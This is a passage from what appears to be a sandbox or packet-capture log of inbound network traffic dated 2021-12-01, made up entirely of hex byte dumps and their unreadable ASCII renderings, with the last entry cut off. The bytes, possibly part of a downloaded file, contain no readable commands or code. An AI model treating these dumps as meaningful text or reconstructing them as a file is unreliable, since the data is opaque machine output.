2021-12-01 15:23:14 UTC	339	IN	Data Raw: 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f 96 49 0c ea 24 24 32 43 14 0a ee 21 bf 3d ec 30 42 84 34 45 17 8f d8 e3 8d a0 7f Data Ascii: 0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4EI$$2C!=0B4E
2021-12-01 15:23:14 UTC	340	IN	Data Raw: 76 fa fc 7e d3 a7 5f 29 c7 2f 48 f2 f2 34 bb d4 7c 8f 96 ba cb b8 20 3d f5 4e 8a 3a 44 92 53 3d f9 6c 9f 62 42 61 0a 31 d1 91 14 16 f2 6e 25 25 a7 e7 11 b8 ad 9c 87 f7 62 21 37 6c 8a 8d 20 26 ad e7 c6 47 93 da 46 6c ed 1f 24 3f 74 6a fd 3d 66 1f f3 d1 5e da f3 b8 27 59 62 43 9a 02 68 7d cc 5c 30 dc ef b2 1e ba a2 e9 35 ff 5d 3a 77 06 04 fc a1 1e a3 ac 78 72 66 4b ab c7 ac 6e 79 d8 60 5d b2 1d 21 b3 87 f3 03 9d 69 86 cb a7 72 ef 39 99 dc 82 77 9f f0 2f 30 dc b4 34 99 87 29 18 16 88 f2 6b fb 16 1c bb c8 dc 2a 18 03 ee f1 a9 85 4b 08 74 d0 e4 89 3f e3 84 24 b3 44 38 1f 3b 36 60 5b c3 5b c4 53 c3 16 11 00 4d 05 e7 03 6e 76 f3 b9 c8 56 3b a7 1b 46 62 be 82 e3 9a 59 b1 1f 1c 3a ea bf 3a d6 6b 78 86 ca de a4 9f f7 41 8f d4 62 df 39 49 1e 2b bd bc a6 72 d4 0c e1 Data Ascii: v~_)/H4| =N:DS=lbBa1n%%b!7l &GFl$?tj=f^'YbCh}\05]:wxrfKny`]!ir9w/04)k*Kt?$D8;6`[[SMnvV;FbY::kxAb9I+r
2021-12-01 15:23:14 UTC	342	IN	Data Raw: ac b4 63 92 17 be 37 27 a1 e2 15 7e 39 92 79 fc d5 a4 79 9c 7d e4 3c 52 69 16 97 1b ab 16 0f 76 02 f4 13 fc d8 26 23 a6 71 3d b0 d2 48 bf b5 ed b4 bb 29 1a ab ba 39 cb d8 62 c4 c8 c2 31 7c bf fb a3 78 9a 5e d1 77 20 99 7d 5f 3e fd 55 2c 50 b8 a5 fc 43 10 7c 8d 39 ee 2b db 06 97 a4 e8 0c 7c 9f fb d4 e0 e1 32 fd 04 96 d0 a5 ec 22 2d da c2 8c d1 47 8b f3 bf 20 3e c8 b8 fc 28 3a f5 8a 2a 58 a2 70 a2 2b de 70 65 17 88 23 b5 6f a8 45 54 80 98 67 57 32 43 c5 24 6a d3 1d 26 0d 62 c8 c9 b6 14 a2 a0 1c af 5b 55 34 45 a9 ec d9 c5 6f e8 19 87 bb 34 58 bf 3a 6e 9f 6f 56 ad 1c 2d 2d bc cd 61 27 27 9d f0 30 4e 7a af bb a6 0b f3 cc c8 cb 47 e4 6b 1c 6d 1a 92 37 fc 4f 31 70 0e ed 14 76 9c 17 80 11 8d f2 7c 5d fa 38 ee 45 15 8a 2d c5 49 18 02 94 d5 06 e8 32 5c e6 55 06 56 Data Ascii: c7'~9yy}<Riv&#q=H)9b1|x^w }_>U,PC|9+|2"-G >(:*Xp+pe#oETgW2C$j&b[U4Eo4X:noV--a''0NzGkm7O1pv|]8E-I2\UV
2021-12-01 15:23:14 UTC	343	IN	Data Raw: 5f 52 fa a2 9d c4 ba 2c ca df 94 4b fa 61 2c 7c 62 5e f2 26 2f df 4e c4 aa a4 56 3a 2d d6 ee 29 9d db ba 30 72 7b dc 10 05 79 f3 6b b7 0d 0c 76 44 84 3e 67 1f 3c f1 1a 6b ec 14 13 96 48 af 22 70 4d 67 c1 7c 13 97 c5 f5 91 93 ed 80 9a 66 ce e4 08 7c d8 34 4a e7 1a 21 a4 76 1b 18 40 1a 73 52 2e 7e 18 02 f1 39 c3 34 d4 8b 22 1e 37 f9 d7 9a fc f6 98 23 25 93 d0 f4 40 54 68 3a 08 de 8c 1d ac 89 ad 86 ae 02 f0 46 0c 88 2f c9 4f f0 5d 66 e2 61 dc 28 57 31 c2 ad 8e dc 41 25 21 cd 47 1b a4 1a 2a 73 ed c1 c4 bf 20 3f f5 e3 48 45 50 d2 73 19 88 37 fc 42 76 f9 f3 cb d3 30 43 1c 3d f5 d5 67 48 e5 16 4c 82 39 fe f6 11 ea 5e b1 80 7a 1b ad 0b 43 d3 b0 b7 50 22 62 cf 7b 8b 33 14 c9 55 44 02 ba a9 14 09 54 9b a9 96 2f 41 61 4f 3c 67 b1 13 8f ce 93 4b 41 1d bb 23 95 f9 e3 Data Ascii: _R,Ka,|b^&/NV:-)0r{ykvD>g<kH"pMg|f|4J!v@sR.~94"7#%@Th:F/O]fa(W1A%!G*s ?HEPs7Bv0C=gHL9^zCP"b{3UDT/AaO<gKA#
2021-12-01 15:23:14 UTC	344	IN	Data Raw: 30 46 80 e2 c0 29 12 24 b9 0b 6f 68 f9 3c 6e 62 50 82 a3 d4 ea 27 af 8d 62 b0 ac fe d4 8a 3a 77 98 77 89 73 98 2f 56 98 48 8a 2a f9 9d 26 7c 6a 78 77 89 ae 83 cf 65 cc 0c d5 f5 b1 04 e2 03 86 a2 88 62 a3 70 8c 26 32 45 bb 06 15 4a b9 a8 f2 35 f9 df 9f 46 d0 c5 31 43 6b 78 17 8c 38 1f 8d 02 9b 71 1b b2 89 b4 e6 cc af 98 75 07 0d 7a 0b 60 ff d4 4c f0 46 0c 9c 74 e5 81 b0 1c 85 15 e0 82 4c 83 a3 ef 83 ec 00 63 70 6e a1 e7 8b bc 92 96 57 31 b7 a3 ae 84 35 ec c5 cc 27 da 88 a9 5c d9 7a 15 24 dc 22 be cf e9 ae 89 ad 10 42 aa 48 a5 8e cd 5b 56 af 01 3d eb b7 31 a1 68 fd cd 52 af 5f 1a cf e0 79 0b 64 c7 57 2d b2 89 d2 2c 3d 73 70 fe 49 12 69 40 65 58 c3 d7 69 76 1b b5 c7 93 68 9a 2d 48 9c 74 e2 01 c4 d6 c6 b1 31 56 a1 e1 82 24 79 60 67 e6 6d ef 48 9f fb c8 9c 86 Data Ascii: 0F)$oh<nbP'b:wws/VH*&|jxwebp&2EJ5F1Ckx8quz`LFtLcpnW15'\z$"BH[V=1hR_ydW-,=spIi@eXivh-Ht1V$y`gmH
2021-12-01 15:23:14 UTC	346	IN	Data Raw: 98 42 82 32 53 dc e3 53 5f c6 9b ee 28 5e de 75 c4 95 a7 7a 60 dd 9d fb eb 95 4c 1c 5a 20 4f 2f c9 46 43 de 47 6b 47 88 11 96 50 b5 eb ff c0 80 6c 6e a5 e2 1d b9 2c 3a 18 da d0 62 86 20 36 77 e3 f8 bd 68 9a c4 9a 4c 85 b1 79 c3 17 be c0 2e 40 6c f9 cc ac 34 86 b4 8f 46 94 56 b1 01 00 d3 5b 15 e2 93 d1 7a 14 14 6c 2f 9d 52 d8 76 07 7b 97 cd 6d 14 3a de 2c d0 e0 14 1b a4 cb ed 01 ee 5e 4c 9b f9 de 07 d1 2d f3 97 a0 f6 48 86 2a 5d 67 9b a8 24 41 8a 21 a5 e3 8b 1b 91 54 6a 92 c7 ae 8b a2 61 1a 6a 7d 8b c0 26 cc ca db 84 1c 58 3e 2d b9 ab f0 28 59 26 c9 31 e3 26 4a 13 7c 16 04 e1 00 97 ce b9 56 26 95 ce fe 4d 13 e9 f9 61 22 b4 12 14 12 18 06 11 f4 d2 c2 4d bc ab 1b a7 45 10 9b 0c 8b 38 dd 86 3c 6a 6e 91 57 f5 b0 15 3c 78 16 0f 16 50 85 21 c1 cc 62 cc cf 6f 88 Data Ascii: B2SS_(^uz`LZ O/FCGkGPln,:b 6whLy.@l4FV[zl/Rv{m:,^L-H*]g$A!Tjaj}&X>-(Y&1&J|V&Ma"ME8<jnW<xP!bo
2021-12-01 15:23:14 UTC	347	IN	Data Raw: 50 bd d0 6b ed a3 e4 04 ff 2b a3 18 c0 a6 6c 27 a7 ee 3e 7e 97 5e df 8e 51 31 3b 7c 51 2d ce ff ca 25 e9 04 2a 44 94 92 46 08 69 33 cf 6f 76 ff 52 2f c9 5e d2 f6 a3 a7 49 d0 f9 dd 14 60 76 e5 0e 78 ff 55 69 93 bb 7f 27 0f f1 26 c2 9d d3 51 cf ec 72 74 63 5b c7 43 8e a3 f0 c9 bc 49 9a 0f f0 4f 2b 47 64 cd 41 17 92 68 ca d2 5f 53 34 44 99 da 93 48 28 c7 92 44 15 89 95 f5 c2 52 c9 52 b3 01 4b 6f 0b 7b 0d 2f cb 40 66 c2 c5 45 8f 0c f6 d1 a5 e7 11 9b 92 31 d0 68 8d a4 67 48 94 73 12 0f 1a 4e ba b7 3a 7f 81 be 38 af 08 75 59 31 5c 77 83 22 3f 8d c6 c9 c2 af 00 c4 d5 69 4f 51 28 de 53 23 a9 1f ba bb 20 b1 d6 f0 a4 be b9 b4 a4 54 d1 67 d8 ad 14 11 90 5e e1 e1 96 c5 2c 54 b7 35 e1 94 57 b7 e1 85 25 74 1c b2 83 8b ca c9 c6 9d fb ca cc c6 e7 ec 25 36 31 c3 54 af 00 Data Ascii: Pk+l'>~^Q1;|Q-%*DFi3ovR/^I`vxUi'&Qrtc[CIO+GdAh_S4DH(DRRKo{/@fE1hgHsN:8uY1\w"?iOQ(S# Tg^,T5W%t%61T
2021-12-01 15:23:14 UTC	348	IN	Data Raw: 31 55 d4 ef 2c aa da 75 40 62 fb cf 95 42 e0 11 90 57 34 f2 eb 20 20 bf 5d e8 fb c3 69 7a 09 f3 e5 83 b8 b2 80 93 08 ce ec 57 2d ce 71 14 1f ae 88 20 bf de 89 a7 89 cf 6f 54 8a 3c d7 11 07 7e 80 4c 86 3d fb cd d1 a4 3c 7c 60 bf 32 e1 f1 3f 2e 35 ce fa 48 e7 8e b3 81 f6 5d 5f 53 33 5b b9 69 60 5d 2e 40 78 10 14 b4 45 3b e2 82 33 7f 72 ec 0f 9b e4 81 f0 2c 53 33 cc 46 4d 27 b2 ea 57 22 1b d4 ed 08 ee a9 f0 6f ee 66 d9 6f 69 79 03 8a 75 86 1c 5e dd 24 20 ab f8 5d 35 fc ad 8a 61 43 0a f0 2c e9 6e cf 6c 66 33 8a 92 8c c8 55 f1 bd 18 02 e3 17 c0 b8 b3 0c fe d6 30 23 af 3f e0 01 29 ab 0b e5 cc c4 d1 70 eb 2f 2b 8c 38 48 b4 a3 4e be 3f 0c e7 0e 5f 4e ba b3 0a 67 b9 6f 72 d0 95 d3 cb 40 fb 2e 07 44 91 23 27 d6 ef a2 76 1c 8d 64 e8 24 95 13 63 df 43 14 80 d4 ed 84 Data Ascii: 1U,u@bBW4 ]izW-q oT<~L=<|`2?.5H]_S3[i`].@xE;3r,S3FM'W"ofoiyu^$ ]5aC,nlf3U0#?)p/+8HN?_Ngor@.D#'vd$cC
2021-12-01 15:23:14 UTC	350	IN	Data Raw: 99 40 e0 13 a2 e7 1b 0f 26 85 56 cf e9 27 27 24 3a 75 d2 18 c1 50 a8 59 38 f9 e6 cb 60 d4 e1 00 49 34 ab ee 60 8f 10 02 f1 35 7b 9d f6 25 45 17 41 17 0a dc cf 5c d0 e3 72 7e e7 13 62 57 5a 70 2d d8 fc d8 8f 71 fd fa 8c 38 ea 35 32 97 a5 67 58 aa 82 3b e0 96 4e 6a 46 1f 37 ff 72 8f 4d 6c 2b c3 df 25 01 54 a8 9a 55 f7 c4 78 ac ff 1d b9 d9 97 79 f2 c9 d9 2c ae bb b7 e0 b0 92 cd 4d db dd 00 5c cb e7 e5 0c b3 f0 ea 6a e3 8d 37 1a 10 82 48 5b 10 89 a9 0d ba a8 06 f7 04 8a ad c0 be 3f 6b cd 4c 82 33 24 d1 3f 54 60 d6 e9 24 09 d4 fd cb 41 e7 79 ac 3d 2e 5c df 04 c4 78 0d 7b 88 bf 11 80 b3 63 c6 2e 5a 3c 41 13 97 ca cf f8 e4 a3 fe 92 50 02 0f 31 da 36 7d 1a d2 4d 18 89 6e 55 29 cd 93 dd 2e bf 85 ac 4d 1b 2c 88 83 b7 bb fc e6 00 db 5e c7 e5 6a 5d 49 c1 5a 31 19 28 Data Ascii: @&V''$:uPY8`I4`5{%EA\r~bWZp-q852gX;NjF7rMl+%TUxy,M\j7H[?kL3$?T`$Ay=.\x{c.Z<AP16}MnU).M,^j]IZ1(
2021-12-01 15:23:14 UTC	351	IN	Data Raw: 29 45 76 1d 4a b7 37 e4 0b 7c f9 4a f1 52 d4 0f 3b da 10 85 c0 5f 3f b7 ac 0d e0 dc 8d 98 88 63 cc a2 21 5c 42 61 d6 95 4b 4a 09 64 cd 42 6e 0e ad 25 6e ea 23 ac 94 af 97 4f e0 1b b3 1d 4b d7 f7 4b dd 93 de 05 04 6b b9 3a 68 3b e8 3f e3 8e cd 18 d1 7c 1d b9 f3 ac 70 8d 26 fc 40 7b 8a 27 d9 bb e7 82 35 5a 9a 8c 3b f7 dc 1d 5f c0 3a bc af 08 e3 68 39 70 71 a8 80 06 ff bd ca 01 42 95 6a 8a e4 07 77 9c 7d 71 f3 31 0a e3 8e 53 cf 14 86 70 e4 1d be a9 c0 21 f8 97 c9 51 38 38 ca 03 7e 01 d0 22 3b 6b 46 d3 67 5c d0 5d 6c 6f e3 4c 82 2e 55 d6 12 d6 db 1e 1f 0f 9b 63 c0 8d 39 71 34 da 6b 5d 8e cb d0 ce 3b de 8c f5 ce e4 01 e3 82 bd b8 67 41 1b b9 ac 09 b9 3e 76 1b 20 b0 0b a1 6c 7e 93 e2 87 27 11 2b 6f 6f fd 5c 44 04 76 8c be 2c 0e 74 62 8a d2 74 6b e0 d6 da 6a 86 Data Ascii: )EvJ7|JR;_?c!\BaKJdBn%n#OKKk:h;?|p&@{'5Z;_:h9pqBjw}q1Sp!Q88~";kFg\]loL.Uc9q4k];gA>v l~'+oo\Dv,tbtkj
2021-12-01 15:23:14 UTC	352	IN	Data Raw: a5 d0 01 b5 81 89 5c 4d 4a 7a 73 57 d1 e7 cb a1 74 20 2c a2 e1 bb 56 a0 68 fb 50 b1 0d f1 39 f1 a0 75 67 bc e1 cd 5b 5e d3 eb 31 2b 2c 52 bb 01 db 32 04 71 7c 0f 94 c1 c0 44 7a 16 0f 64 5a f8 74 bd 2a 5e 26 aa c5 1e a1 ff de ed f9 85 5e d3 71 a8 84 a1 70 cf 97 cc c5 b3 ff 83 9f 39 f5 d3 f1 c6 2c cd 7a c2 ca c7 40 68 20 de e5 b4 29 17 9b f9 d7 6e e8 3c 62 b6 88 ca c7 4c 17 bd 33 5b de d8 fb de 0f 0e 47 4f c9 47 15 6e 7d 06 f4 c1 cc 04 fb cd 46 82 1b 52 4f 3a 7f 59 3e 97 24 ca 86 3b ff dc 17 12 7a fa a0 87 44 6b 14 f5 17 9b 34 a9 84 c3 79 c8 ba 3b 5d a3 63 f8 ac 0c 9a db 17 92 a8 0e 3a 31 dd 97 da 7e 0a 3a 82 ae e7 96 a4 7d 8e 51 fd c3 35 64 dc e2 00 c7 53 35 f9 d5 d4 df 69 9b 93 42 01 f3 4e a5 e3 7a ea 55 b8 b5 c4 d2 f7 d0 e0 1d bc e0 06 fb cb 42 05 e2 f2 Data Ascii: \MJzsWt ,VhP9ug[^1+,R2q|DzdZt*^&^qp9,z@h )n<bL3[GOGn}FRO:Y>$;zDk4y;]c:1~:}Q5dS5iBNzUB
2021-12-01 15:23:14 UTC	354	IN	Data Raw: 41 05 72 95 4a fc bc c6 64 a2 f7 91 27 c9 de b5 b3 96 64 20 a6 26 d6 61 99 c1 9e 79 72 da 7e 8d b8 b0 34 77 1e 56 b6 00 5f 4c 94 48 8f 0f 5e 2f 52 21 b3 18 1c 3a e6 82 db 86 23 b3 9e ef a0 71 6b 73 f9 4e 3c 7d 8e 5f 13 a5 7a 16 05 f5 bc ad 2c 5b 44 9f fb 2d 3a 1a c6 de d8 0a df 52 0b 66 2f b7 4a 7d 0c ac 15 c6 2a 49 11 91 25 28 ab 0d 89 2f bf 34 d4 5b 53 37 fa c0 77 8e c4 d5 70 64 2c 52 bb 32 b2 20 4b c1 5f 4d 0e 0f 7a 81 21 e4 1b b1 01 fc 24 cd 2f 47 1d 12 07 a5 e2 6a 69 7f 58 a0 be bc 67 d6 7e 1a cf e6 56 d5 64 ce ff fb 0a 16 0d 60 62 f7 12 08 fe 5a ad f5 4e ed c0 a1 e3 99 25 6b ec ae f8 5e d1 76 24 d1 88 28 5f cd 89 b0 49 05 ad 01 cf e7 cb 59 27 ac 62 2f 82 1f 46 8a 24 ea 3a b1 1f 27 32 0b 6f 7d 89 52 40 17 d6 0a ef a2 e3 d3 3e 72 ff c2 20 73 47 eb b2 Data Ascii: ArJd'd &ayr~4wV_LH^/R!:#qksN<}_z,[D-:Rf/J}*I%(/4[S7wpd,R2 K_Mz!$/GjiXg~Vd`bZN%k^v$(_IY'b/F$:'2o}R@>r sG
2021-12-01 15:23:14 UTC	355	IN	Data Raw: a5 7b 48 83 a5 ea ef aa 53 28 33 50 77 82 3b ee e3 93 60 d7 02 67 9d fc 4f 3e c8 df 32 42 fb 4f e5 9c 7e 0a 39 f4 89 bb 1f 3d 6a 3b f7 d4 ea 73 1c ba b6 bd bd ba a4 63 4e b2 79 0a 77 d7 98 28 88 21 bf 3d 17 40 f3 81 bb 2c 55 29 96 74 65 44 96 cd 1c bc a6 7d 86 d6 a5 29 20 34 4f b3 36 9a 84 30 ce c5 8a c9 d9 eb d9 85 21 34 5a a7 e4 0a 0b 23 0f 62 c2 c6 12 1a 84 db f0 d5 f0 ad 15 8f dd 9d 1c 7e e5 11 1d e0 ec a1 bd 3d e0 08 eb 47 63 a0 86 22 34 82 3e fa c5 76 ff 53 a0 7d 88 2a 5b ae f5 c1 a0 7e 1b 2d e4 e9 72 ff 56 fa 89 b1 01 40 95 41 8e 53 35 f9 d4 08 d1 30 bf 37 fb 0e 11 1e ae 5d 5c d1 6e 16 91 fb df 96 4a 82 db db de ef aa 9c c3 6c 14 8b 21 55 29 d6 f5 2f 43 40 64 d5 69 77 77 a9 83 40 69 61 40 b6 b8 52 b1 69 e1 7b 83 ab 16 dd 97 d4 e3 09 f0 d6 f3 a6 6e Data Ascii: {HS(3Pw;`gO>2BO~9=j;scNyw(!=@,U)teD}) 4O60!4Z#b~=Gc"4>vS}*[~-rV@AS507]\nJl!U)/C@diww@ia@Ri{n
2021-12-01 15:23:14 UTC	356	IN	Data Raw: b6 61 4b 01 45 f2 25 57 3a 18 9c a0 6e e0 08 22 23 6c f3 c7 cc 5a 78 15 43 03 13 1b 20 f5 d9 a6 65 2e cd 18 f0 2e c5 49 63 dc 3a b9 29 10 15 b7 ad 35 21 a7 39 ff ab 98 7f 5c da 27 a1 89 35 c7 9c 75 5c d0 c9 c1 66 2c 53 c5 45 24 a1 dd 57 31 08 eb dc 90 30 81 b8 74 ee 16 84 48 58 ba 60 c8 00 55 b3 66 07 f8 76 d7 6c ff de 53 36 fc 4d 05 b7 3f 22 3d 6e 79 5d 50 a5 ea dc e6 45 fe c7 5f 44 46 96 dc e9 c5 a6 f2 bb e0 12 10 1e d7 2f ad ec 35 f3 2b 4f ef ad 1c 25 5c 28 27 d9 26 23 a1 63 1a cd 44 9c 7c c3 59 3d e7 92 a8 a2 a3 72 e8 27 61 41 c2 c4 4d 8c f3 a0 71 6c 0c 13 dc fa d1 73 64 50 d4 66 16 08 7c 86 60 20 bd 73 a5 f8 51 3b 01 32 97 35 f4 46 58 a3 7d 02 bc 4c 16 9f 33 d7 68 fa a0 04 3d 0d 66 cd ce a7 26 34 5a a7 1c cf 0e 45 50 bb 2a 9a 46 01 cd 3e 94 d9 f1 60 Data Ascii: aKE%W:n"#lZxC e..Ic:)5!9\'5u\f,SE$W10tHX`UfvlS6M?"=ny]PE_DF/5+O%\('&#cD|Y=r'aAMqlsdPf|` sQ;25FX}L3h=f&4ZEP*F>`
2021-12-01 15:23:14 UTC	358	IN	Data Raw: 42 59 38 19 0c 8d 62 3b 88 95 a0 f9 a8 62 54 5f cd 28 d5 1a 20 e6 09 56 cd d7 1c c7 18 8d bd 40 e6 78 ea 19 56 f1 d7 e2 07 85 ad ec b7 55 af 18 29 9a c0 a4 57 a3 e1 00 1b d3 79 d2 14 97 cc c1 9f e0 82 be c4 27 27 f8 21 b5 21 a3 0f d3 f1 36 7d 86 e4 0e 8f 53 7b 76 96 3a 36 68 fa 56 57 62 7c 95 cf 7b 1f 9b 49 e1 7a eb 3b a5 18 38 51 d7 26 d2 18 1e 39 c4 fc f9 2f 5c 9a d1 00 d9 9f 6d b7 2c d9 ff ca c7 57 27 48 29 dd 5d 4b e7 15 5a ab 88 f8 57 2c 36 e0 87 b7 c1 c6 5c c8 c2 da ee a1 b3 4e bb 37 fd 35 32 b7 cc 53 aa ec 23 ac 94 af 01 72 7b b8 61 94 d4 79 91 4e b5 f3 41 13 17 9d 1b 21 07 91 d1 14 80 8a 3a e3 0f 9a ac 07 e4 1d b0 85 af 9f a7 dd 8a 27 b0 6f 91 c9 06 7c 00 c7 b3 06 95 56 9d 22 c0 24 a7 e3 13 0a ed 3c 7a 88 cb ca 3f 0a 11 91 a9 8e 34 96 58 33 49 0b Data Ascii: BY8b;bT_( V@xVU)Wy''!!6}S{v:6hVWb|{Iz;8Q&9/\m,W'H)]KZW,6\N752S#r{ayNA!:'o|V"$<z?4X3I
2021-12-01 15:23:14 UTC	359	IN	Data Raw: 23 d3 e1 f0 d2 02 70 3f ff 54 db 5e 22 c5 4c 0c f2 bb 68 fa 56 ac 12 29 ac 06 f4 51 2b 26 ac c7 1b 32 42 92 57 ad 6c f7 d0 e0 82 bb 87 b7 2f 56 ce ff ca da 7c 88 c1 43 05 f0 45 1b a4 60 26 a4 a4 7a d5 65 9b 1f 4d f8 6a d0 8a 2f cd d0 c4 c4 4d 3c aa 25 2a c4 1c d0 1e 38 ff 47 e4 13 9a 59 b8 3a d8 1a fe d9 fe 8a 31 d5 6e d0 75 85 ba a9 82 5e d5 f7 e6 c8 37 05 8e 1f 63 41 19 82 a5 8c 3d 73 52 61 4c 74 13 f4 d8 ba 33 c4 d9 78 11 98 55 c4 45 5a 5b 6b c4 d1 8d 61 a2 96 b6 f0 a3 ad 12 12 84 17 94 c8 f8 86 d5 ad ad 94 d2 d0 02 0b 14 0a 62 ce f9 40 39 a5 f3 ac 81 75 c2 02 e0 39 57 1d 4f de 88 ad 0d e1 06 f8 c4 42 95 37 6f e6 e2 eb 28 8d ee 16 84 1a 80 1e 3b f4 10 06 b8 b2 8b 29 ef 49 be c2 18 e6 ff 53 b1 42 65 d7 93 fb 23 51 c8 3b 0a 1d 5b a0 83 58 a2 1c b5 51 f7 Data Ascii: #p?T^"LhV)Q+&2BWl/V|CE`&zeMj/M<%*8GY:1nu^7cA=sRaLt3xUEZ[kab@9u9WOB7o(;)ISBe#Q;[XQ
2021-12-01 15:23:14 UTC	360	IN	Data Raw: 7e f3 cb d0 7c fa a8 0d b1 03 e0 83 a0 c1 34 da 87 7d 78 86 cb 52 33 77 9c a4 76 ac 0a 83 af b4 db 42 95 87 b6 23 ac 26 b8 10 87 20 f1 a2 68 27 02 73 74 7a 1b a4 bc 4d 91 45 90 e6 01 47 01 73 ef bf 22 cf 66 c4 04 f8 db 60 c9 84 21 42 67 ba 8f 26 29 dc 1a 90 64 db 6a 07 9f 90 ac 4b 7f b7 61 66 31 59 86 f9 21 21 e6 90 df 8b 35 05 9d 65 34 8f 3c fc f5 29 48 9c 6d a0 80 b1 08 12 0c e1 50 a2 b2 89 4f a9 ac 8b 5f b2 ce 1b a0 72 e2 9d d6 f6 b2 ee 45 28 a3 72 90 c1 1d 73 7c 15 81 73 63 54 b4 b9 a1 73 34 5f 54 b4 76 07 9c 54 2b 83 ad 15 81 af 7e 58 11 9e 6f ff ae 98 8b a0 6e e8 3c 2b 20 cb 40 6c 77 a3 ee c9 d0 76 45 17 9b e4 fc 07 69 0a e5 80 95 30 11 6e d0 d0 5c ce fd 07 7d 8c 2f d6 79 00 e3 80 0e 0c 1c ac 14 70 0d 24 c3 e5 82 39 60 2f 94 be dd e2 b7 36 67 db 00 Data Ascii: ~|4}xR3wvB#& h'stzMEGs"f`!Bg&)djKaf1Y!!5e4<)HmPO_rE(rs|scTs4_TvT+~Xon<+ @lwvEi0n\}/yp$9`/6g
2021-12-01 15:23:14 UTC	362	IN	Data Raw: fb c8 57 5f 7c 48 ef b2 2d 82 3f 99 cb db 52 14 b2 45 35 b2 8d 94 20 08 fc df b5 a1 52 a7 15 f8 2d b7 22 38 32 e1 9c 5b d0 d0 57 23 62 9c 5a 79 64 b6 73 59 d3 62 96 63 b2 6b 81 dd 6c a3 2f 85 93 f9 99 d2 ef 05 ee 79 4f 24 87 f3 8b a1 73 48 57 9d 0e 7c e5 30 ac 61 6e ba d3 7c b0 08 f2 9b 9a 13 6d 58 f2 64 c8 e1 9a 08 03 d2 f2 89 cc 80 2a ba bd 7d 33 8a d0 67 cb da 3d 91 ec bf 3c f5 36 ff 88 72 6e 81 3f 91 28 fb 1f 6c 54 76 83 0d 69 90 f0 a2 20 26 85 08 bf dd 5b 9d b9 c7 fb bc cc 69 fc 74 f2 0b 39 9b 6a 41 58 b5 69 93 5b 3e 46 47 a6 16 be ab 35 21 0d 9d 70 1a bf 74 02 1e f8 c3 fb 57 3a 1b fc 74 3b 47 b8 ef 9b b9 5f 2d 09 b1 13 24 ed 27 e7 0f 5e 84 1e 87 c9 60 98 c3 ed 22 c0 49 9b bb 5f 52 ec d0 62 53 60 77 61 69 7d af b4 41 39 28 dc fa fc c7 4a a4 23 cb 97 Data Ascii: W_|H-?RE5 R-"82[W#bZydsYbckl/yO$sHW|0an|mXd*}3g=<6rn?(lTvi &[it9jAXi[>FG5!ptW:t;G_-$'^`"I_RbS`wai}A9(J#
2021-12-01 15:23:14 UTC	363	IN	Data Raw: 35 fe 4b 1f b3 0d 71 7e 49 2c e2 14 1c ae 56 b4 2c 81 a4 f9 b0 8f 90 c7 f9 ce f2 86 bf c6 12 06 c5 44 81 ba b3 fa ba 48 1c 03 8e 32 84 e1 75 da 62 2a 5e d9 9e bd 33 8d c6 63 4c 8b 21 3d 47 d4 e7 5e c4 2c ad 2e 1e 54 b7 39 6a e3 16 67 ae 0f 93 15 73 94 3c 9f 5b 4f 25 35 a0 80 1e 38 70 17 74 73 1d 86 67 24 3a 72 7d ea 30 db f5 06 4b e4 fb 86 f0 8e 5a a2 fb fa 44 00 f3 78 b6 2b 5d 01 d9 f4 40 84 c8 2d 94 1d 1e 38 6c 6c 90 5d 2b c2 78 1f ad 84 b3 ec 0c 35 30 4c 85 1d 58 b9 a1 1c c8 df 17 74 f6 d7 e3 9d ea 00 37 08 58 cc 3b 7c 33 37 94 2c a9 8d ea d1 e3 57 32 c4 d1 b7 23 1a 6a 0d 9c 45 f4 cd 90 49 d5 7d 45 17 9f f0 2f 02 fc 45 06 f0 e9 b5 d9 0b 66 c5 5b 44 9f 91 4b 0b 63 49 02 e4 42 bc 09 6d 75 04 94 a2 fb c6 4c b2 57 c3 c1 46 02 7f 8a b8 a8 4a 90 bd d4 20 36 Data Ascii: 5Kq~I,V,DH2ub*^3cL!=G^,.T9jgs<[O%58ptsg$:r}0KZDx+]@-8ll]+x50LXt7X;|37,W2#jEI}E/Ef[DKcIBmuLWFJ 6
2021-12-01 15:23:14 UTC	364	IN	Data Raw: 57 4b b7 a6 6f bf 99 37 75 49 11 4a 8e 96 5a 71 73 60 da f9 27 a6 1b 24 1b 62 2f 2c 9d f3 66 c5 12 72 0a f3 a4 7a 70 dc 8b 9d f8 c5 d1 62 a7 12 d9 7e 80 06 f5 22 2f b9 d1 87 20 76 f5 b9 43 9f ff 71 6a 14 d2 c8 af d1 f5 0e e3 75 08 aa 1d fa 72 fa 5e c5 aa 64 3e c5 6e 3c 45 05 6c f3 4c 0d f4 5e 4d 94 ab 1f b2 85 27 39 0c e6 00 cf 8f 90 14 ba ad 1d 34 9c 99 4e 2a 56 a4 7e 02 69 a1 ee dc e6 49 b3 05 73 66 5d 3a 8f 90 ab b5 20 3e ea 63 39 f7 df 9b 7b a2 79 90 c1 58 aa f7 56 40 66 c5 52 b4 f5 d5 fb ae 80 1e 3b f4 90 d7 c5 ef a1 07 03 84 ca c0 b8 2e d8 eb af 08 e8 fd c8 0a b0 94 48 80 8b 37 1f b7 35 e4 e1 7c e2 ed ff af eb ae 82 a7 8f 3b 73 fe 32 5a af 1e a9 2d 06 51 f0 ac a1 3c 73 66 cf 6c 30 a7 7c 30 9a 49 0d 60 d5 b4 aa 00 f1 7c 1d b9 37 f6 9b e8 b8 61 c1 45 Data Ascii: WKo7uIJZqs`'$b/,frzpb~"/ 